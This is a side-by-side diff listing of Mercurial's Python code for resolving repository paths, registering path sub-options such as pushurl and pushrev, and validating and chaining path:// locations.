571 ``name`` can be a named path or locations. Locations are filesystem
558 paths or URIs.
572 paths or URIs.
559
573
560 Returns None if ``name`` is not a registered path, a URI, or a local
574 Returns None if ``name`` is not a registered path, a URI, or a local
561 path to a repo.
575 path to a repo.
562 """
576 """
563 # Only fall back to default if no path was requested.
577 # Only fall back to default if no path was requested.
564 if name is None:
578 if name is None:
565 if not default:
579 if not default:
566 default = ()
580 default = ()
567 elif not isinstance(default, (tuple, list)):
581 elif not isinstance(default, (tuple, list)):
568 default = (default,)
582 default = (default,)
569 for k in default:
583 for k in default:
570 try:
584 try:
571 return self[k]
585 return self[k]
572 except KeyError:
586 except KeyError:
573 continue
587 continue
574 return None
588 return None
575
589
576 # Most likely empty string.
590 # Most likely empty string.
577 # This may need to raise in the future.
591 # This may need to raise in the future.
578 if not name:
592 if not name:
579 return None
593 return None
580
594
581 try:
595 try:
582 return self[name]
596 return self[name]
583 except KeyError:
597 except KeyError:
584 # Try to resolve as a local path or URI.
598 # Try to resolve as a local path or URI.
585 try:
599 try:
586 # we pass the ui instance are warning might need to be issued
600 # we pass the ui instance are warning might need to be issued
587 return path(ui, None, rawloc=name)
601 return path(ui, None, rawloc=name)
588 except ValueError:
602 except ValueError:
589 raise error.RepoError(_(b'repository %s does not exist') % name)
603 raise error.RepoError(_(b'repository %s does not exist') % name)
590
604
591
605
592 _pathsuboptions = {}
606 _pathsuboptions = {}
593
607
594
608
595 def pathsuboption(option, attr):
609 def pathsuboption(option, attr):
596 """Decorator used to declare a path sub-option.
610 """Decorator used to declare a path sub-option.
597
611
598 Arguments are the sub-option name and the attribute it should set on
612 Arguments are the sub-option name and the attribute it should set on
599 ``path`` instances.
613 ``path`` instances.
600
614
601 The decorated function will receive as arguments a ``ui`` instance,
615 The decorated function will receive as arguments a ``ui`` instance,
602 ``path`` instance, and the string value of this option from the config.
616 ``path`` instance, and the string value of this option from the config.
603 The function should return the value that will be set on the ``path``
617 The function should return the value that will be set on the ``path``
604 instance.
618 instance.
605
619
606 This decorator can be used to perform additional verification of
620 This decorator can be used to perform additional verification of
607 sub-options and to change the type of sub-options.
621 sub-options and to change the type of sub-options.
608 """
622 """
609
623
610 def register(func):
624 def register(func):
611 _pathsuboptions[option] = (attr, func)
625 _pathsuboptions[option] = (attr, func)
612 return func
626 return func
613
627
614 return register
628 return register
615
629
616
630
617 @pathsuboption(b'pushurl', b'pushloc')
631 @pathsuboption(b'pushurl', b'pushloc')
618 def pushurlpathoption(ui, path, value):
632 def pushurlpathoption(ui, path, value):
619 u = url(value)
633 u = url(value)
620 # Actually require a URL.
634 # Actually require a URL.
621 if not u.scheme:
635 if not u.scheme:
622 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
636 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
623 return None
637 return None
624
638
625 # Don't support the #foo syntax in the push URL to declare branch to
639 # Don't support the #foo syntax in the push URL to declare branch to
626 # push.
640 # push.
627 if u.fragment:
641 if u.fragment:
628 ui.warn(
642 ui.warn(
629 _(
643 _(
630 b'("#fragment" in paths.%s:pushurl not supported; '
644 b'("#fragment" in paths.%s:pushurl not supported; '
631 b'ignoring)\n'
645 b'ignoring)\n'
632 )
646 )
633 % path.name
647 % path.name
634 )
648 )
635 u.fragment = None
649 u.fragment = None
636
650
637 return bytes(u)
651 return bytes(u)
638
652
639
653
640 @pathsuboption(b'pushrev', b'pushrev')
654 @pathsuboption(b'pushrev', b'pushrev')
641 def pushrevpathoption(ui, path, value):
655 def pushrevpathoption(ui, path, value):
642 return value
656 return value
643
657
644
658
645 class path(object):
659 class path(object):
646 """Represents an individual path and its configuration."""
660 """Represents an individual path and its configuration."""
647
661
648 def __init__(self, ui, name, rawloc=None, suboptions=None):
662 def __init__(self, ui, name, rawloc=None, suboptions=None):
649 """Construct a path from its config options.
663 """Construct a path from its config options.
650
664
651 ``ui`` is the ``ui`` instance the path is coming from.
665 ``ui`` is the ``ui`` instance the path is coming from.
652 ``name`` is the symbolic name of the path.
666 ``name`` is the symbolic name of the path.
653 ``rawloc`` is the raw location, as defined in the config.
667 ``rawloc`` is the raw location, as defined in the config.
654 ``pushloc`` is the raw locations pushes should be made to.
668 ``pushloc`` is the raw locations pushes should be made to.
655
669
656 If ``name`` is not defined, we require that the location be a) a local
670 If ``name`` is not defined, we require that the location be a) a local
657 filesystem path with a .hg directory or b) a URL. If not,
671 filesystem path with a .hg directory or b) a URL. If not,
658 ``ValueError`` is raised.
672 ``ValueError`` is raised.
659 """
673 """
660 if not rawloc:
674 if not rawloc:
661 raise ValueError(b'rawloc must be defined')
675 raise ValueError(b'rawloc must be defined')
662
676
663 # Locations may define branches via syntax <base>#<branch>.
677 # Locations may define branches via syntax <base>#<branch>.
664 u = url(rawloc)
678 u = url(rawloc)
665 branch = None
679 branch = None
666 if u.fragment:
680 if u.fragment:
667 branch = u.fragment
681 branch = u.fragment
668 u.fragment = None
682 u.fragment = None
669
683
670 self.url = u
684 self.url = u
671 # the url from the config/command line before dealing with `path://`
685 # the url from the config/command line before dealing with `path://`
672 self.raw_url = u.copy()
686 self.raw_url = u.copy()
673 self.branch = branch
687 self.branch = branch
674
688
675 self.name = name
689 self.name = name
676 self.rawloc = rawloc
690 self.rawloc = rawloc
677 self.loc = b'%s' % u
691 self.loc = b'%s' % u
678
692
679 self._validate_path()
693 self._validate_path()
680
694
681 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
695 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
682 self._own_sub_opts = {}
696 self._own_sub_opts = {}
683 if suboptions is not None:
697 if suboptions is not None:
684 self._own_sub_opts = suboptions.copy()
698 self._own_sub_opts = suboptions.copy()
685 sub_opts.update(suboptions)
699 sub_opts.update(suboptions)
686 self._all_sub_opts = sub_opts.copy()
700 self._all_sub_opts = sub_opts.copy()
687
701
688 self._apply_suboptions(ui, sub_opts)
702 self._apply_suboptions(ui, sub_opts)
689
703
690 def chain_path(self, ui, paths):
704 def chain_path(self, ui, paths):
691 if self.url.scheme == b'path':
705 if self.url.scheme == b'path':
692 assert self.url.path is None
706 assert self.url.path is None
693 try:
707 try:
694 subpath = paths[self.url.host]
708 subpath = paths[self.url.host]
695 except KeyError:
709 except KeyError:
696 m = _(b'cannot use `%s`, "%s" is not a known path')
710 m = _(b'cannot use `%s`, "%s" is not a known path')
697 m %= (self.rawloc, self.url.host)
711 m %= (self.rawloc, self.url.host)
698 raise error.Abort(m)
712 raise error.Abort(m)
699 if subpath.raw_url.scheme == b'path':
713 if subpath.raw_url.scheme == b'path':
700 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
714 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
701 m %= (self.rawloc, self.url.host)
715 m %= (self.rawloc, self.url.host)
702 raise error.Abort(m)
716 raise error.Abort(m)
703 self.url = subpath.url
717 self.url = subpath.url
704 self.rawloc = subpath.rawloc
718 self.rawloc = subpath.rawloc
705 self.loc = subpath.loc
719 self.loc = subpath.loc
706 if self.branch is None:
720 if self.branch is None:
707 self.branch = subpath.branch
721 self.branch = subpath.branch
708 else:
722 else:
709 base = self.rawloc.rsplit(b'#', 1)[0]
723 base = self.rawloc.rsplit(b'#', 1)[0]
710 self.rawloc = b'%s#%s' % (base, self.branch)
724 self.rawloc = b'%s#%s' % (base, self.branch)
711 suboptions = subpath._all_sub_opts.copy()
725 suboptions = subpath._all_sub_opts.copy()
712 suboptions.update(self._own_sub_opts)
726 suboptions.update(self._own_sub_opts)
713 self._apply_suboptions(ui, suboptions)
727 self._apply_suboptions(ui, suboptions)
714
728
715 def _validate_path(self):
729 def _validate_path(self):
716 # When given a raw location but not a symbolic name, validate the
730 # When given a raw location but not a symbolic name, validate the
717 # location is valid.
731 # location is valid.
718 if (
732 if (
719 not self.name
733 not self.name
720 and not self.url.scheme
734 and not self.url.scheme
721 and not self._isvalidlocalpath(self.loc)
735 and not self._isvalidlocalpath(self.loc)
722 ):
736 ):
723 raise ValueError(
737 raise ValueError(
724 b'location is not a URL or path to a local '
738 b'location is not a URL or path to a local '
725 b'repo: %s' % self.rawloc
739 b'repo: %s' % self.rawloc
726 )
740 )
727
741
728 def _apply_suboptions(self, ui, sub_options):
742 def _apply_suboptions(self, ui, sub_options):
729 # Now process the sub-options. If a sub-option is registered, its
743 # Now process the sub-options. If a sub-option is registered, its
730 # attribute will always be present. The value will be None if there
744 # attribute will always be present. The value will be None if there
731 # was no valid sub-option.
745 # was no valid sub-option.
732 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
746 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
733 if suboption not in sub_options:
747 if suboption not in sub_options:
734 setattr(self, attr, None)
748 setattr(self, attr, None)
735 continue
749 continue
736
750
737 value = func(ui, self, sub_options[suboption])
751 value = func(ui, self, sub_options[suboption])
738 setattr(self, attr, value)
752 setattr(self, attr, value)
739
753
740 def _isvalidlocalpath(self, path):
754 def _isvalidlocalpath(self, path):
741 """Returns True if the given path is a potentially valid repository.
755 """Returns True if the given path is a potentially valid repository.
742 This is its own function so that extensions can change the definition of
756 This is its own function so that extensions can change the definition of
743 'valid' in this case (like when pulling from a git repo into a hg
757 'valid' in this case (like when pulling from a git repo into a hg
744 one)."""
758 one)."""
745 try:
759 try:
746 return os.path.isdir(os.path.join(path, b'.hg'))
760 return os.path.isdir(os.path.join(path, b'.hg'))
747 # Python 2 may return TypeError. Python 3, ValueError.
761 # Python 2 may return TypeError. Python 3, ValueError.
748 except (TypeError, ValueError):
762 except (TypeError, ValueError):
749 return False
763 return False
750
764
751 @property
765 @property
752 def suboptions(self):
766 def suboptions(self):
753 """Return sub-options and their values for this path.
767 """Return sub-options and their values for this path.
754
768
755 This is intended to be used for presentation purposes.
769 This is intended to be used for presentation purposes.
756 """
770 """
757 d = {}
771 d = {}
758 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
772 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
759 value = getattr(self, attr)
773 value = getattr(self, attr)
760 if value is not None:
774 if value is not None:
761 d[subopt] = value
775 d[subopt] = value
762 return d
776 return d
General Comments 0
You need to be logged in to leave comments. Login now